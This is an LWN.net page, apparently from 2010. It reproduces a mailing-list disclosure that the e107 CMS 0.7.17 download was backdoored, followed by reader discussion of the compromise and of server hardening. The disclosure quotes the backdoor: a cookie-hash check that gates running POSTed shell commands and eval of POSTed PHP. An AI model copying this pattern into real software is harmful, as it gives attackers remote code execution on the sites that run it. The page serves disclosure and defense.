|
|
Log in / Subscribe / Register

Backdoor in e107 CMS version 0.7.17

[Posted January 25, 2010 by jake]

From:  Bogdan Calin <bogdan-AT-acunetix.com>
To:  full-disclosure-AT-lists.grok.org.uk
Subject:  e107 latest download link is backdoored
Date:  Mon, 25 Jan 2010 12:58:50 +0200
Message-ID:  <4B5D796A.2020203@acunetix.com>
Cc:  bugtraq-AT-securityfocus.com
Archive‑link:  Article

Hi guys,

The latest version of e107, version 0.7.17 contains a PHP backdoor.
http://e107.org/e107_files/downloads/e107_v0.7.17_full.zip

I've just downloaded this file and while looking through the code, I've
found the following piece of code:

file: class2.php, line: 1876

if(md5($_COOKIE['access-admin']) == "cf1afec15669cb96f09befb7d70f8bcb") {

...

if(!empty($_POST['cmd'])){
$out = execute($_POST['cmd']);
}

elseif(!empty($_POST['php'])){
ob_start();
eval($_POST['php']);
$out = ob_get_contents();
ob_end_clean();
}

...

and so on.

I've informed the e107 guys about this situation.
For now, that link is not safe.

Look at the file date, class2.php has been modified on 2010-01-23, 21:52:26

-- 
Bogdan Calin - bogdan@acunetix.com
CTO
Acunetix Ltd. - http://www.acunetix.com
Acunetix Web Security Blog - http://www.acunetix.com/blog

to post comments

Backdoor in e107 CMS version 0.7.17

Posted Jan 26, 2010 2:34 UTC (Tue) by busterb (subscriber, #560) [Link] (5 responses)

BTW, it also appears that the linked website is covered in cialis link-spam,
probably a result of the backdoor. Proceed with caution.

Backdoor in e107 CMS version 0.7.17

Posted Jan 26, 2010 14:22 UTC (Tue) by cdman (guest, #63220) [Link] (4 responses)

It seems to be fixed now and they also have a notification on their front page about a security update (although they could have used a bigger font :-)). Also, I couldn't find the given piece of code in their CVS repo, which probably means that only their website got hacked, not a dev...

Backdoor in e107 CMS version 0.7.17

Posted Jan 26, 2010 14:31 UTC (Tue) by johill (subscriber, #25196) [Link] (3 responses)

Are you sure? The security update on their page seems to say that 0.7.17 is the solution, while this article says it is the problem.

Backdoor in e107 CMS version 0.7.17

Posted Jan 27, 2010 6:43 UTC (Wed) by njs (subscriber, #40338) [Link] (2 responses)

There's speculation on full-disclosure (click "Thread" above) that that security announcement about 0.7.17 is to fix a *different* hole... and that this other hole was used to compromise e107.org and insert this backdoor into the 0.7.17 "critical security fix, upgrade now if not sooner" release.

Backdoor in e107 CMS version 0.7.17

Posted Jan 28, 2010 10:34 UTC (Thu) by epa (subscriber, #39769) [Link] (1 responses)

Would using a hashing VCS such as Git have prevented this? If we all became accustomed to instructions such as 'please upgrade to a4732abc41412' rather than 'please download foo-1.2.3.tar.gz', would it become more difficult to insert such backdoors?

Backdoor in e107 CMS version 0.7.17

Posted Jan 28, 2010 19:26 UTC (Thu) by njs (subscriber, #40338) [Link]

In principle it could help, but mostly by making it easier to recover after the repository was compromised (which doesn't seem to have happened here in any case). Presumably they would just change the website to say "please upgrade to 1412a4732abc8" or whatever and no-one would notice that either. Signatures could help in principle, but key management and achieving trust is it's own barrel of worms, and these sorts of attacks are surprisingly rare; I'm not sure how much effort it's worth expending to defend against them.

If you *really* want to compromise the users of some project, it's pretty straightforward -- just come up with a plausible pseudonym, and send some legitimate patches that "accidentally" introduce an old-fashioned security bug. All the crypto in the world won't help with that. There are plenty of people you'd expect to be expending real resources on this, too -- militaries, criminals, heck, security researchers (who build their reputation and consulting business through finding bugs). The only reason I can think of that we haven't caught anyone at it yet is that earnest engineers produce enough security holes that people who depend on security holes mostly don't find it worth the bother trying to add more.

e107 + mod_php = evil

Posted Jan 26, 2010 8:36 UTC (Tue) by efexis (guest, #26355) [Link] (1 responses)

Wow. Thanks guys. I've had SO much trouble thanks to that e107 software on a server I semi-manage where e107 was compromised and, with php running as a module within apache, with that single apache user for all virtual hosts, they pulled site config files w/mysql passwords off every other php based site, then all the user accounts details from all those databases, and some stuff even more serious (it was all very nicely logged! That &cmd=xxx ended up in the apache logs as nearly all requests were GETs).

It's such a disastrously insecure setup, yet very common, I'm completely amazed by it. Anyone running php virtual hosts out there, I highly recommend mod_fcgid, a rewrite of the earlier fastcgi that runs well and stable and talks to php instances that run under their own UIDs through pipes. In most cases it shouldn't need changes to existing php code, but in some cases it can do, however it's so worth it, php should not be run any other way*.

(*or at all, there's -everything else- out there that's better!)

e107 + mod_php = evil

Posted Jan 26, 2010 14:28 UTC (Tue) by cortana (subscriber, #24596) [Link]

Huge AOL on mod_fcgid. I can't understand why it's not used _everywhere_.

I hope it makes it into apache httpd proper some day!


Copyright © 2010, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds